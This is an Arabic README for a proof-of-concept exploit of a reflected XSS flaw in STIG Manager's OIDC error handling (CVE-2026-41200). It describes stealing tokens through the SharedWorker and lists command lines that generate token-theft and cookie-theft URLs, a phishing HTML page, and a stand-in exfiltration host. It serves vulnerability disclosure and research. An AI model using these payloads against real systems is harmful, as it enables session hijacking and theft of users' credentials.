
إثبات مفهوم مفاهيمي لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في إصدارات STIG Manager من 1.5.10 حتى 1.6.7.
توجد ثغرة XSS منعكسة في كود معالجة أخطاء مصادقة OIDC في تطبيق STIG Manager للويب. تتم كتابة معاملات الاستعلام error و error_description التي يعيدها موفّر OIDC مباشرة إلى DOM عبر innerHTML بدون تهريب HTML. يمكن للمهاجم الذي يستطيع إنشاء URL ضار وإقناع مستخدم بفتحه تنفيذ JavaScript عشوائي في سياق التطبيق.
تكون الثغرة في أشد حالاتها خطورة عندما يكون لدى المستخدم المستهدف جلسة STIG Manager نشطة في علامة تبويب أخرى بالمتصفح — إذ يمكن للكود المحقون التواصل مع SharedWorker الذي يدير رمز الوصول، مما يتيح إجراء طلبات API موثّقة نيابة عن الضحية.
# توليد URL ردّ اتصال خبيث (وضع سرقة رمز SharedWorker)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# توليد حمولة بسيطة لسرقة ملفات تعريف الارتباط
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# الإخراج كصفحة HTML للتصيّد
python3 cve-2026-41200-poc.py --format html
# مضيفات API ومضيفات تسريب مخصصة
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
هذه الأداة مُقدَّمة لأغراض تعليمية وللبحث الأمني المصرّح به فقط.